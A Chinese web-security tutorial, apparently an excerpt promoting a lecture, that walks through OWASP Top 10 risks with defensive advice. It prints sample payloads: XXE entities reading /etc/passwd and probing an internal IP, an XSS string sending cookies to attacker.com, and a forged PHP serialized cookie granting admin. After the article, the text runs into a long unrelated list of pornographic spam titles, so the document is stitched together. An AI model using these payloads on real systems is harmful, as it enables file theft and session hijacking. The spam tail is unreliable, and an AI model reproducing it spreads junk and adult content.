    場(chǎng)景 #2:一個(gè)網(wǎng)站上沒有使用或強(qiáng)制使用 TLS,或者僅使用弱加密算法。攻擊者通過監(jiān)測(cè)網(wǎng)絡(luò)流量(如:不安全的無線網(wǎng)絡(luò)),將網(wǎng)絡(luò)連接從 HTTPS 降級(jí)到 HTTP,就可以截取請(qǐng)求并竊取用戶會(huì)話 cookie。然后,攻擊者可以復(fù)制用戶 cookie 并成功劫持經(jīng)過認(rèn)證的用戶會(huì)話、訪問或修改用戶個(gè)人信息。除此之外,攻擊者還可以更改所有傳輸過程中的數(shù)據(jù),如:轉(zhuǎn)款的接收者。

    場(chǎng)景 #3:密碼數(shù)據(jù)庫使用未加鹽的哈希算法或弱哈希算法去存儲(chǔ)密碼,此時(shí),一個(gè)文件上傳漏洞可使黑客能夠獲取密碼文件,而這些未加鹽的哈希密碼通過彩虹表暴力破解方式即可快速破解。

    各國應(yīng)對(duì)措施

    日本個(gè)人信息保護(hù)法

    近年來,因信息、通信技術(shù)的發(fā)展,企業(yè)需要收集大量個(gè)人信息,用以提供準(zhǔn)確且迅速的服務(wù)。個(gè)人信息的利用,無論是對(duì)現(xiàn)今的商業(yè)活動(dòng),還是對(duì)國民生活都變得不可或缺。但是,另一方面,由于處理個(gè)人信息狀況不當(dāng),導(dǎo)致個(gè)人權(quán)利和利益受到損害的可能性也在增大。在日本,包含企業(yè)和政府等團(tuán)體的組織內(nèi)部,泄露的個(gè)人信息數(shù)量累積超過了1000萬件。于是,鑒于規(guī)范處理個(gè)人信息,明確國家及地方公共團(tuán)體的職責(zé),確保個(gè)人信息有效利用等目的,日本于2005年4月1日起頒布《個(gè)人信息保護(hù)法》。

    歐盟《通用數(shù)據(jù)保護(hù)條例》(GDPR)

    歐盟《通用數(shù)據(jù)保護(hù)條例》(General Data Protection Regulation,簡(jiǎn)稱GDPR),其前身是歐盟在1995年制定的《計(jì)算機(jī)數(shù)據(jù)保護(hù)法》,該法明確規(guī)定:

  • 對(duì)違法企業(yè)的罰金最高可達(dá)2000萬歐元(約合1.5億元人民幣)或其全球營(yíng)業(yè)額的4%,以高者為準(zhǔn)。
  • 網(wǎng)站經(jīng)營(yíng)者必須事先向客戶說明會(huì)自動(dòng)記錄客戶的搜索和購物記錄,并獲得用戶的同意,否則按“未告知記錄用戶行為”作違法處理。
  • 企業(yè)不能再使用模糊、難以理解的語言,或冗長(zhǎng)的隱私政策來從用戶處獲取數(shù)據(jù)使用許可。
  • 明文規(guī)定了用戶的“被遺忘權(quán)”(right to be forgotten),即用戶個(gè)人可以要求責(zé)任方刪除關(guān)于自己的數(shù)據(jù)記錄。
  • 設(shè)計(jì)安全賬號(hào)系統(tǒng)的正確姿勢(shì)

    數(shù)據(jù)安全防范的方法簡(jiǎn)單來說,當(dāng)數(shù)據(jù)從用戶鍵盤敲出的那一刻,到服務(wù)器后臺(tái)存儲(chǔ)過程中,都需保持正確的姿勢(shì)。如:

  • 用正確的姿勢(shì)保存密碼a) 低級(jí)錯(cuò)誤:明文保存密碼b) 低級(jí)錯(cuò)誤:可逆加密密碼c) 錯(cuò)誤方法:md5 加密密碼d) 正確方法:加鹽 hash 保存密碼

  • 用正確的姿勢(shì)傳輸數(shù)據(jù)a) 驗(yàn)證服務(wù)端的合法性b) 確保通信的安全

  • 用正確的姿勢(shì)加密敏感信息

  • 用正確的姿勢(shì)對(duì)數(shù)據(jù)進(jìn)行備份和監(jiān)控

  • XML 外部實(shí)體(XXE)

    許多較早的或配置錯(cuò)誤的 XML 處理器評(píng)估了 XML 文件中的外部實(shí)體引用。攻擊者可以利用外部實(shí)體竊取使用 URI 文件處理器的內(nèi)部文件和共享文件、監(jiān)聽內(nèi)部掃描端口、執(zhí)行遠(yuǎn)程代碼和實(shí)施拒絕服務(wù)攻擊。

    可利用性:一般如果攻擊者可以上傳 XML 文檔或在 XML 文檔中添加惡意內(nèi)容(如,易受攻擊的代碼、依賴項(xiàng)或集成),他們就能夠攻擊含有缺陷的 XML 處理器。

    普遍性:常見一般來說,許多舊的 XML 處理器能夠?qū)ν獠繉?shí)體、XML 進(jìn)程中被引用和評(píng)估的 URI 進(jìn)行規(guī)范。SAST 工具可以通過檢查依賴項(xiàng)和安全配置來發(fā)現(xiàn) XXE 缺陷。DAST 工具需要額外的手動(dòng)步驟來檢測(cè)和利用 XXE 缺陷。

    技術(shù)影響:嚴(yán)重XXE 缺陷可用于提取數(shù)據(jù)、執(zhí)行遠(yuǎn)程服務(wù)器請(qǐng)求、掃描內(nèi)部系統(tǒng)、執(zhí)行拒絕服務(wù)攻擊和其他攻擊。

    自查:您的應(yīng)用程序脆弱嗎?

    應(yīng)用程序,特別是基于 XML 的 Web 服務(wù),可能在以下方面容易受到攻擊:

  • 您的應(yīng)用程序直接接受 XML 文件或者接受 XML 文件上傳,特別是來自不受信任源的文件,或者將不受信任的數(shù)據(jù)插入 XML 文件,并提交給 XML 處理器解析。
  • 在應(yīng)用程序或基于 Web 服務(wù)的 SOAP 中,所有 XML 處理器都啟用了文檔類型定義(DTDs)。
  • 為了實(shí)現(xiàn)安全性或單點(diǎn)登錄(SSO),您的應(yīng)用程序應(yīng)該使用了 SAML進(jìn)行身份認(rèn)證,而假設(shè) SAML 使用了XML進(jìn)行身份確認(rèn),那么您的應(yīng)用程序就容易受到 XXE 攻擊。
  • 如果您的應(yīng)用程序使用第 1.2 版之前的 SOAP,并將XML實(shí)體傳遞到SOAP 框架,那么它可能受到 XXE 攻擊。
  • 存在 XXE 缺陷的應(yīng)用程序更容易受到拒絕服務(wù)攻擊,如: Billion Laughs 攻擊。
  • 如何防止?

    培訓(xùn)開發(fā)人員的安全意識(shí),是識(shí)別和減少 XXE 的關(guān)鍵,除此之外,還需要:

  • 盡可能地使用簡(jiǎn)單的數(shù)據(jù)格式(如:JSON),避免對(duì)敏感數(shù)據(jù)進(jìn)行序列化。
  • 及時(shí)修復(fù)或更新應(yīng)用程序或底層操作系統(tǒng)使用的 XML 處理器和庫。同時(shí),通過依賴項(xiàng)檢測(cè),將 SOAP 更新到 1.2 版本或更高版本。
  • 參考《OWASP Cheat Sheet ‘XXE Prevention‘》,在應(yīng)用程序的所有XML解析器中禁用XML外部實(shí)體和DTD進(jìn)程。
  • 在服務(wù)器端實(shí)施(“白名單”)輸入驗(yàn)證、過濾和清理, 以防止在XML文檔、標(biāo)題或節(jié)點(diǎn)中出現(xiàn)惡意數(shù)據(jù)。
  • 驗(yàn)證XML或XSL文件上傳功能是否使用了XSD驗(yàn)證或其他類似的驗(yàn)證。
  • 盡管在許多集成環(huán)境中,手動(dòng)代碼審查是大型、復(fù)雜應(yīng)用程序的最佳選擇,但是SAST 工具可以檢測(cè)源代碼中的XXE漏洞。 如果無法實(shí)現(xiàn)這些控制,請(qǐng)考慮使用虛擬修復(fù)程序、API安全網(wǎng)關(guān)或Web應(yīng)用程序防火墻( WAF )來檢測(cè)、監(jiān)控和防止XXE攻擊。
  • 攻擊案例場(chǎng)景

    目前,已經(jīng)有大量XXE缺陷被發(fā)現(xiàn)并公開,這些缺陷包括上傳可被接受的惡意XML文件、嵌入式設(shè)備的 XXE缺陷及深嵌套的依賴項(xiàng)等。

    場(chǎng)景 #1:攻擊者嘗試從服務(wù)端提取數(shù)據(jù):

    <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo>

    場(chǎng)景 #2:攻擊者通過將上面的實(shí)體行更改為以下內(nèi)容來探測(cè)服務(wù)器的專用網(wǎng)絡(luò):

    <!ENTITY xxe SYSTEM "https://192.168.1.1/private" >]>

    場(chǎng)景 #3:攻擊者通過惡意文件執(zhí)行拒絕服務(wù)攻擊:

    <!ENTITY xxe SYSTEM "file:///dev/random" >]>

    XML基本定義

    XML是用于標(biāo)記電子文件使其具有結(jié)構(gòu)性的標(biāo)記語言,可以用來標(biāo)記數(shù)據(jù)、定義數(shù)據(jù)類型,是一種允許用戶對(duì)自己的標(biāo)記語言進(jìn)行定義的源語言。XML文檔結(jié)構(gòu)包括XML聲明、DTD文檔類型定義(可選)、文檔元素。 圖片來自網(wǎng)絡(luò)

    XML由3個(gè)部分構(gòu)成,分別是:文檔類型定義(Document Type Definition,DTD),即XML的布局語言;可擴(kuò)展的樣式語言(Extensible Style Language,XSL),即XML的樣式表語言;以及可擴(kuò)展鏈接語言(Extensible Link Language,XLL)。

    XML 中的實(shí)體分為以下五種:字符實(shí)體,命名實(shí)體,外部實(shí)體,參數(shù)實(shí)體,內(nèi)部實(shí)體,普通實(shí)體和參數(shù)實(shí)體都分為內(nèi)部實(shí)體和外部實(shí)體兩種,外部實(shí)體定義需要加上 SYSTEM關(guān)鍵字,其內(nèi)容是URL所指向的外部文件實(shí)際的內(nèi)容。如果不加SYSTEM關(guān)鍵字,則為內(nèi)部實(shí)體,表示實(shí)體指代內(nèi)容為字符串。

    XML外部實(shí)體

    XML外部實(shí)體表示外部文件的內(nèi)容,用 SYSTEM 關(guān)鍵詞表示:

    <!ENTITY test SYSTEM "1.xml">

    有些XML文檔包含system標(biāo)識(shí)符定義的“實(shí)體”,這些文檔會(huì)在DOCTYPE頭部標(biāo)簽中呈現(xiàn)。這些定義的“實(shí)體”能夠訪問本地或者遠(yuǎn)程的內(nèi)容。比如,下面的XML文檔示例就包含了XML“實(shí)體”。

    <?xml version="1.0" encoding="utf-8"?><!DOCTYPE Anything [<!ENTITY entityex SYSTEM "file:///etc/passwd">]><abc>&entityex;</abc>

    在上面的代碼中, XML外部實(shí)體 ‘entityex’ 被賦予的值為:file://etc/passwd。在解析XML文檔的過程中,實(shí)體’entityex’的值會(huì)被替換為URI(file://etc/passwd)內(nèi)容值(也就是passwd文件的內(nèi)容)。 關(guān)鍵字’SYSTEM’會(huì)告訴XML解析器,’entityex’實(shí)體的值將從其后的URI中讀取,并把讀取的內(nèi)容替換entityex出現(xiàn)的地方。假如 SYSTEM 后面的內(nèi)容可以被用戶控制,那么用戶就可以隨意替換為其他內(nèi)容,從而讀取服務(wù)器本地文件(file:///etc/passwd)或者遠(yuǎn)程文件(http://www.baidu.com/abc.txt)。

    XXE 注入定義

    XXE注入(即XML External Entity, XML外部實(shí)體注入)。通過 XML 實(shí)體,”SYSTEM”關(guān)鍵詞導(dǎo)致 XML 解析器可以從本地文件或者遠(yuǎn)程 URI 中讀取數(shù)據(jù)。攻擊者可以通過 XML 實(shí)體傳遞自己構(gòu)造的惡意值,從而引導(dǎo)處理程序解析它。當(dāng)引用外部實(shí)體時(shí),攻擊者通過構(gòu)造惡意內(nèi)容,可讀取任意文件、執(zhí)行系統(tǒng)命令、探測(cè)內(nèi)網(wǎng)端口、攻擊內(nèi)網(wǎng)網(wǎng)站等行為。

    XXE 漏洞原理

    最常見的 XXE 漏洞類型分為以下三種:

  • 基礎(chǔ)的 XXE 注入— 外部實(shí)體注入本地D TD
  • 基于盲注的 XXE 注入—XML 解析器在響應(yīng)中不顯示任何錯(cuò)誤
  • 基于錯(cuò)誤的 XXE 注入—成功解析之后,XML 解析器始終顯示 SAME 響應(yīng)。(即“您的消息已被接收”),因此,我們可能希望解析器將文件的內(nèi)容“打印”到錯(cuò)誤響應(yīng)中。
  • 既然 XML 可以從外部讀取 DTD 文件,那我們就自然地想到了如果將路徑換成另一個(gè)文件的路徑,那么服務(wù)器在解析這個(gè) XML 的時(shí)候就會(huì)把那個(gè)文件的內(nèi)容賦值給 SYSTEM 前面的根元素中,只要我們?cè)?XML 中讓前面的根元素的內(nèi)容顯示出來,就可以讀取那個(gè)文件的內(nèi)容了。這就造成了一個(gè)任意文件讀取的漏洞。

    假設(shè)我們指向的是一個(gè)內(nèi)網(wǎng)主機(jī)的端口呢?是否會(huì)給出錯(cuò)誤信息,我們是不是可以從錯(cuò)誤信息上來判斷內(nèi)網(wǎng)主機(jī)這個(gè)端口是否開放,這就造成了一個(gè)內(nèi)部端口被探測(cè)的問題。一般來說,服務(wù)器解析 XML 有兩種方式,一種是一次性將整個(gè) XML 加載進(jìn)內(nèi)存中,進(jìn)行解析;另一種是一部分的、“流式”地加載、解析。如果我們遞歸地調(diào)用 XML 定義,一次性調(diào)用巨量的定義,那么服務(wù)器的內(nèi)存就會(huì)被消耗完,造成了拒絕服務(wù)攻擊。

    失效的訪問控制

    未對(duì)通過身份驗(yàn)證的用戶實(shí)施恰當(dāng)?shù)脑L問控制。攻擊者可以利用這些缺陷,訪問未經(jīng)授權(quán)的功能或數(shù)據(jù),例如:訪問其他用戶的賬戶、查看敏感文件、修改其他用戶的數(shù)據(jù)、更改訪問權(quán)限等。

    安全配置錯(cuò)誤

    安全配置錯(cuò)誤是最常見的安全問題,這通常是由于不安全的默認(rèn)配置、不完整的臨時(shí)配置、開源云存儲(chǔ)、錯(cuò)誤的 HTTP 標(biāo)頭配置以及包含敏感信息的詳細(xì)錯(cuò)誤信息所造成的。因此,我們不僅需要對(duì)所有的操作系統(tǒng)、框架、庫和應(yīng)用程序進(jìn)行安全配置,而且必須及時(shí)修補(bǔ)和升級(jí)它們。

    跨站腳本(XSS)

    當(dāng)應(yīng)用程序的新網(wǎng)頁中包含不受信任的、未經(jīng)驗(yàn)證或轉(zhuǎn)義的數(shù)據(jù)時(shí),或者使用可以創(chuàng)建 HTML 或 JavaScript 的瀏覽器 API 更新現(xiàn)有網(wǎng)頁時(shí),就會(huì)出現(xiàn) XSS 缺陷。XSS 讓攻擊者能夠在受害者的瀏覽器中執(zhí)行腳本,并劫持用戶會(huì)話、破壞網(wǎng)站或?qū)⒂脩糁囟ㄏ虻綈阂庹军c(diǎn)。

    可利用性:容易自動(dòng)化工具能夠檢測(cè)并利用所有的三種 XSS 形式,并且存放在便于攻擊者利用的漏洞中。

    普遍性:廣泛XSS 是 OWASP Top10 中第二普遍的安全問題,存在于近三分之二的應(yīng)用程序中。

    可檢測(cè)性:容易自動(dòng)化工具能發(fā)現(xiàn) XSS 問題,尤其是一些成熟的技術(shù)框架中,如:PHP、J2EE 或 JSP、ASP.NET 等。

    技術(shù)影響:中等XSS 對(duì)于反射和 DOM 的影響是中等的,而對(duì)于存儲(chǔ)的 XSS,XSS 的影響更為嚴(yán)重,譬如在受到攻擊的瀏覽器上執(zhí)行遠(yuǎn)程代碼,如:竊取憑證和會(huì)話或傳遞惡意軟件等。

    自查:您的應(yīng)用程序脆弱嗎?

    針對(duì)用戶的瀏覽器,存在三種 XSS 類型:

  • 反射式 XSS:應(yīng)用程序或 API 包含未經(jīng)驗(yàn)證和未經(jīng)轉(zhuǎn)義的用戶輸入,并作為 HTML 輸出的一部分,受到此類攻擊可以讓攻擊者在受害者的瀏覽器中執(zhí)行任意的 HTML 和 JavaScript。
  • 存儲(chǔ)式 XSS:你的應(yīng)用或者 API 將未凈化的用戶輸入進(jìn)行存儲(chǔ),并在其他用戶或者管理員的頁面展示出來。存儲(chǔ)型 XSS 一般被認(rèn)為是高危或嚴(yán)重的風(fēng)險(xiǎn)。
  • 基于 DOM 的 XSS:會(huì)動(dòng)態(tài)的將攻擊者操控的內(nèi)容加入到頁面的 JavaScript 框架、單頁面程序或 API 中。為避免此類攻擊,你應(yīng)該禁止將攻擊者可控的數(shù)據(jù)發(fā)送給不安全的 JavaScript API。典型的 XSS 攻擊造成的結(jié)果包含:盜取 Session、賬戶、繞過 MFA、DIV替換、對(duì)用戶瀏覽器的攻擊(例如:惡意軟件下載、鍵盤記錄)以及其他用戶側(cè)的攻擊。
  • 如何防止?

    防止 XSS,需要將不可信的數(shù)據(jù)與動(dòng)態(tài)的瀏覽器內(nèi)容區(qū)分開:

  • 使用已解決 XS S問題的框架,如:Ruby 3.0 或 React JS。了解每個(gè)框架對(duì) XSS 保護(hù)的局限性,并適當(dāng)?shù)靥幚砦锤采w的用例。
  • 為了避免反射式或存儲(chǔ)式的 XSS 漏洞,最好的辦法是根據(jù) HTML 輸出的上下文(包括:主體、屬性、JavaScript、CSS或URL) 對(duì)所有不可信的 HTTP 請(qǐng)求數(shù)據(jù)進(jìn)行恰當(dāng)?shù)霓D(zhuǎn)義 。
  • 在客戶端修改瀏覽器文檔時(shí),為了避免 DOM XSS 攻擊,最好的選擇是實(shí)施上下文敏感數(shù)據(jù)編碼。如果這種情況不能避免,可以采用《OWASP Cheat Sheet ‘DOM based XSS Prevention ‘》 一文中描述的類似于上下文敏感的轉(zhuǎn)義技術(shù),并應(yīng)用于瀏覽器 API。
  • 使用內(nèi)容安全策略(CSP)是對(duì)抗 XSS 的最終防御策略。如果不存在可以通過本地文件存放惡意代碼的漏洞(例如:路徑遍歷覆蓋和允許在網(wǎng)絡(luò)中傳輸?shù)囊资芄舻膸?#xff09;,則該策略是有效的。
  • 攻擊案例場(chǎng)景

    場(chǎng)景#1:應(yīng)用程序在下面的 HTML 代碼段構(gòu)造中使用了未經(jīng)驗(yàn)證或轉(zhuǎn)義的不可信的數(shù)據(jù)源:

    (String) page += "<input name='creditcard' type='TEXT‘ value='" + request.getParameter("CC“) + "'>";

    攻擊者在瀏覽器中修改“CC” 參數(shù)為如下值:

    '><script>document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi? foo='+document.cookie</script>'.

    這個(gè)攻擊會(huì)導(dǎo)致受害者的會(huì)話 ID 被發(fā)送到攻擊者的網(wǎng)站,使得攻擊者能夠劫持用戶當(dāng)前會(huì)話。

    內(nèi)容安全策略 (CSP)

    內(nèi)容安全策略 (CSP) 是一個(gè)額外的安全層,用于檢測(cè)并削弱某些特定類型的攻擊,包括跨站腳本 (XSS) 和數(shù)據(jù)注入攻擊等。無論是數(shù)據(jù)盜取、網(wǎng)站內(nèi)容污染還是惡意軟件,這些攻擊都是主要的手段。

    CSP 被設(shè)計(jì)成完全向后兼容(除CSP2 在向后兼容有明確提及的不一致外)。不支持 CSP 的瀏覽器也能與實(shí)現(xiàn)了 CSP 的服務(wù)器正常合作,反之亦然:不支持 CSP 的瀏覽器只會(huì)忽略它,如常運(yùn)行,默認(rèn)為網(wǎng)頁內(nèi)容使用標(biāo)準(zhǔn)的同源策略。如果網(wǎng)站不提供 CSP Header,瀏覽器將使用標(biāo)準(zhǔn)的同源策略。

    為使 CSP 可用, 你需要配置你的網(wǎng)絡(luò)服務(wù)器返回 Content-Security-Policy HTTP Header ( 有時(shí)你會(huì)看到一些關(guān)于 X-Content-Security-Policy Header 的提法, 那是舊版本,你無須再如此指定它)。

    除此之外, 元素也可以被用來配置該策略, 例如:

    <meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*; child-src 'none';">

    上下文敏感數(shù)據(jù)編碼(XSS 編碼與繞過)

    對(duì)于了解 Web 安全的朋友來說,都知道 XSS 這種漏洞,其危害性不用強(qiáng)調(diào)。一般對(duì)于該漏洞的防護(hù)有兩個(gè)思路:一是過濾敏感字符,諸如【<,>,script,'】等,另一種是對(duì)敏感字符進(jìn)行 html 編碼,諸如 php 中的 htmlspecialchars() 函數(shù)。

    一般情況,正確實(shí)施這兩種方案之一就可以有效防御 XSS 漏洞了。但其實(shí)也會(huì)有一些場(chǎng)景,即使實(shí)施了這兩種方案,攻擊者也可以繞過防護(hù),導(dǎo)致 XSS 漏洞被利用。

    場(chǎng)景一:XSS 注入點(diǎn)在某個(gè) html 標(biāo)簽屬性中,代碼片段如下: 可以看到,這里防護(hù)措施采用的是方案一:過濾敏感字符。這里如果輸入javascript:alert (11),是會(huì)被過濾掉的,輸出的內(nèi)容會(huì)是:

    場(chǎng)景二:XSS 注入點(diǎn)在 js 標(biāo)簽中,代碼片段如下: 這里采用的防護(hù)措施是第二種,即使用 php 內(nèi)置函數(shù) htmlspecialchars 對(duì)敏感字符進(jìn)行編碼。如果輸入正常的 payload,如:<img src=1 onerror=alert(11)>,是不會(huì)有彈窗的,此時(shí)瀏覽器的輸出如下圖: 這里的敏感字符< >,已經(jīng)被 html 編碼了,最后在

    標(biāo)簽里面輸出的時(shí)候,瀏覽器再使用 html 解碼將其原文顯示出來,但是并不會(huì)觸發(fā)js引擎,所以也就沒有彈窗。

    下圖是 js 編碼后的 payload:

    不安全的反序列化

    不安全的反序列化會(huì)導(dǎo)致遠(yuǎn)程代碼執(zhí)行。即使反序列化缺陷不會(huì)導(dǎo)致遠(yuǎn)程代碼執(zhí)行,攻擊者也可以利用它們來執(zhí)行攻擊,包括:重播攻擊、注入攻擊和特權(quán)升級(jí)攻擊。

    可利用性:難對(duì)反序列化的利用非常困難。因?yàn)樵诓桓幕蛘{(diào)整底層可被利用代碼的情況下,現(xiàn)成的反序列化漏洞很難被使用。

    可檢測(cè)性:一般有些工具可以被用于發(fā)現(xiàn)反序列化缺陷,但經(jīng)常需要人工幫助來驗(yàn)證發(fā)現(xiàn)的問題。希望有關(guān)反序列化缺陷的普遍性數(shù)據(jù)將隨著工具的開發(fā)而被更多的識(shí)別和解決。

    技術(shù)影響:嚴(yán)重反序列化缺陷的影響不能被低估。它們可能導(dǎo)致遠(yuǎn)程代碼執(zhí)行攻擊,這是可能發(fā)生的最嚴(yán)重的攻擊之一。

    自查:您的應(yīng)用程序脆弱嗎?

    如果反序列化進(jìn)攻者提供惡意代碼或者被篡改過的對(duì)象,將會(huì)使整個(gè)應(yīng)用程序和 API 變的脆弱,這可能會(huì)導(dǎo)致以下兩種主要類型的攻擊:

  • 如果應(yīng)用中存在可以在反序列化過程中或者之后被改變行為的類,則攻擊者可以通過改變應(yīng)用邏輯或者實(shí)現(xiàn)遠(yuǎn)程代碼執(zhí)行攻擊,這種攻擊方式被稱為對(duì)象和數(shù)據(jù)結(jié)構(gòu)攻擊。

  • 典型的數(shù)據(jù)篡改攻擊,如訪問控制相關(guān)的攻擊,其中使用了現(xiàn)有的數(shù)據(jù)結(jié)構(gòu),但內(nèi)容發(fā)生了變化。

  • 在應(yīng)用程序中,序列化可能被用于:

    • 遠(yuǎn)程和進(jìn)程間通信(RPC / IPC)
    • 連線協(xié)議、Web服務(wù)、消息代理
    • 緩存/持久性
    • 數(shù)據(jù)庫、緩存服務(wù)器、文件系統(tǒng)
    • HTTP cookie、HTML 表單參數(shù)、API 身份驗(yàn)證令牌

    如何防止?

    唯一安全的架構(gòu)模式是:不接受來自不受信源的序列化對(duì)象,或使用只允許原始數(shù)據(jù)類型的序列化媒體。 如果上述均無法實(shí)現(xiàn),請(qǐng)考慮使用下面的方法:

  • 執(zhí)行完整性檢查,如:任何序列化對(duì)象的數(shù)字簽名,以防止惡意對(duì)象創(chuàng)建或數(shù)據(jù)篡改。
  • 在創(chuàng)建對(duì)象之前強(qiáng)制執(zhí)行嚴(yán)格的類型約束,因?yàn)榇a通常被期望成一組可定義的類。繞過這種技術(shù)的方法已經(jīng)被證明,所以完全依賴于它是不可取的。
  • 如果可能,隔離運(yùn)行那些在低特權(quán)環(huán)境中的反序列化代碼。
  • 記錄反序列化的例外情況和失敗信息,如:傳入的類型不是預(yù)期的類型,或者反序列處理引發(fā)的例外情況。
  • 限制或監(jiān)視來自于容器或服務(wù)器傳入和傳出的反序列化網(wǎng)絡(luò)連接。
  • 監(jiān)控反序列化,當(dāng)用戶持續(xù)進(jìn)行反序列化時(shí),對(duì)用戶進(jìn)行警告。
  • 攻擊案例場(chǎng)景

    場(chǎng)景 #1:一個(gè) React 應(yīng)用程序調(diào)用了一組 Spring Boot 微服務(wù),為了確保原有的代碼不變,解決方法是序列化用戶狀態(tài),并在每次請(qǐng)求時(shí)來回傳遞。這時(shí),攻擊者可利用“R00”Java 對(duì)象簽名,并使用 Java Serial Killer 工具在應(yīng)用服務(wù)器上獲得遠(yuǎn)程代碼執(zhí)行。

    場(chǎng)景 #2:一個(gè) PHP 論壇使用 PHP 對(duì)象序列化來保存一個(gè)“超級(jí)”cookie。該 cookie 包含了用戶的 ID、角色、密碼哈希和其他狀態(tài):

    a:4:{i:0;i:132;i:1;s:7:"Mallory";i:2;s:4:"user"; i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}

    攻擊者可以更改序列化對(duì)象以授予自己為admin權(quán)限:

    a:4:{i:0;i:1;i:1;s:5:"Alice";i:2;s:5:"admin"; i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}

    使用含有已知漏洞的組件

    組件(例如:庫、框架和其他軟件模塊)擁有和應(yīng)用程序相同的權(quán)限。如果應(yīng)用程序中含有已知漏洞的組件被攻擊者利用,可能會(huì)造成嚴(yán)重的數(shù)據(jù)丟失或服務(wù)器接管。同時(shí),使用含有已知漏洞的組件和API會(huì)破壞應(yīng)用程序的防御手段,造成各種攻擊并產(chǎn)生嚴(yán)重影響。

    不足的日志記錄和監(jiān)控

    不足的日志記錄和監(jiān)控,以及事件響應(yīng)缺失或無效的集成,使攻擊者能夠進(jìn)一步攻擊系統(tǒng),并篡改、提取或銷毀數(shù)據(jù)。大多數(shù)缺陷研究顯示,缺陷被檢測(cè)出的時(shí)間超過 200 天,且通常通過外部檢測(cè)方檢測(cè),而不是通過內(nèi)部流程或監(jiān)控檢測(cè)。

    未雨綢繆 - 項(xiàng)目中如何應(yīng)對(duì)

    開發(fā)人員需要做些什么?

  • 提高風(fēng)險(xiǎn)意識(shí)
  • Code Review
  • 建立可重復(fù)使用的安全流程和標(biāo)準(zhǔn)安全控制
  • 安全檢測(cè)工具a) ZAP Tools b) 靜態(tài)代碼分析
  • 建立持續(xù)性的應(yīng)用安全測(cè)試
  • 管理完整的應(yīng)用程序生命周期
  • 以上便是從本次 Chat——“WebApp 安全風(fēng)險(xiǎn)與防護(hù)(系列二)”中截取的部分內(nèi)容,相信一定能對(duì)您的 WebApp 應(yīng)用程序安全防護(hù)有所幫助。

    更多關(guān)于 WebApp 安全風(fēng)險(xiǎn)防護(hù)手段及葡萄城安全架構(gòu)中的實(shí)踐分享,將在葡萄城系列公開課“WebApp 安全風(fēng)險(xiǎn)與防護(hù)”中,由 Carl 親自講解,誠邀您學(xué)習(xí)觀看。

    歡迎大家掃描下圖二維碼,預(yù)約報(bào)名參加。

    **直播地址:http://live.vhall.com/137416596 **

    **公開課地址:http://live.vhall.com/137416596 **公開課時(shí)間:2019/6/28 (周五)16:00 PM

    最后

    錯(cuò)過本場(chǎng)直播?沒關(guān)系,所有直播內(nèi)容我們會(huì)存放在葡萄城公開課頁面,便于您隨時(shí)觀看、學(xué)習(xí)。

    “賦能開發(fā)者”葡萄城除了為所有開發(fā)人員提供免費(fèi)的開發(fā)技巧分享、項(xiàng)目實(shí)戰(zhàn)經(jīng)驗(yàn)外,還提供了眾多高水準(zhǔn)、高品質(zhì)的開發(fā)工具和開發(fā)者解決方案,可有效幫助開發(fā)人員提高效率,縮短項(xiàng)目周期,使開發(fā)人員能更專注于業(yè)務(wù)邏輯,順利完成高質(zhì)量的項(xiàng)目交付,歡迎您深入了解。

    講師資料:Carl(陳慶),葡萄城高級(jí)架構(gòu)師、葡萄城技術(shù)公開課講師。擁有15年項(xiàng)目開發(fā)經(jīng)驗(yàn),專注于產(chǎn)品架構(gòu)、編程技術(shù)等領(lǐng)域,對(duì)網(wǎng)絡(luò)安全有著獨(dú)到見解,曾擔(dān)任微軟TechEd講師,樂于研究各種前沿技術(shù)并分享。

    閱讀全文: http://gitbook.cn/gitchat/activity/5d0998e6dff5210354877cf0

    您還可以下載 CSDN 旗下精品原創(chuàng)內(nèi)容社區(qū) GitChat App , GitChat 專享技術(shù)內(nèi)容哦。

    總結(jié)

    以上是生活随笔為你收集整理的WebApp 安全入门的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。

    国产乱人无码伦av在线a | 亚洲精品午夜国产va久久成人 | 亚洲 欧美 激情 小说 另类 | 精品国产一区av天美传媒 | 国语精品一区二区三区 | 天堂亚洲免费视频 | 国产麻豆精品一区二区三区v视界 | 国产免费久久精品国产传媒 | 国产小呦泬泬99精品 | 牲欲强的熟妇农村老妇女视频 | 熟妇人妻中文av无码 | 18精品久久久无码午夜福利 | 亚洲日韩一区二区三区 | 男人的天堂av网站 | 午夜精品一区二区三区的区别 | 中文字幕乱码人妻二区三区 | 亚洲国产午夜精品理论片 | 亚洲人成网站色7799 | 欧美日韩亚洲国产精品 | 97精品人妻一区二区三区香蕉 | 国产成人综合色在线观看网站 | 99精品久久毛片a片 | 六十路熟妇乱子伦 | 我要看www免费看插插视频 | 日本一卡2卡3卡四卡精品网站 | 亚洲熟妇自偷自拍另类 | 领导边摸边吃奶边做爽在线观看 | 国内精品人妻无码久久久影院蜜桃 | 国产精品久久久久久久影院 | 日本精品少妇一区二区三区 | 在线天堂新版最新版在线8 | 精品人妻中文字幕有码在线 | 精品少妇爆乳无码av无码专区 | 国产舌乚八伦偷品w中 | 亚洲aⅴ无码成人网站国产app | 国产激情无码一区二区app | 欧美日韩精品 | 国产人妻精品一区二区三区 | 色综合视频一区二区三区 | 久久国产精品萌白酱免费 | 亚洲日本一区二区三区在线 | 亚洲国产精品无码久久久久高潮 | 精品一区二区三区波多野结衣 | 国产综合色产在线精品 | 性欧美熟妇videofreesex | 国产舌乚八伦偷品w中 | 男人扒开女人内裤强吻桶进去 | 丰满人妻被黑人猛烈进入 | av香港经典三级级 在线 | 波多野结衣av一区二区全免费观看 | 88国产精品欧美一区二区三区 | 又大又黄又粗又爽的免费视频 | 丰满妇女强制高潮18xxxx | 人人爽人人澡人人人妻 | 激情内射日本一区二区三区 | 黑森林福利视频导航 | 夜夜影院未满十八勿进 | 人妻少妇被猛烈进入中文字幕 | 久久亚洲精品成人无码 | 亚洲男女内射在线播放 | 中文字幕av伊人av无码av | 亚洲乱码国产乱码精品精 | 婷婷五月综合缴情在线视频 | 精品一区二区三区波多野结衣 | 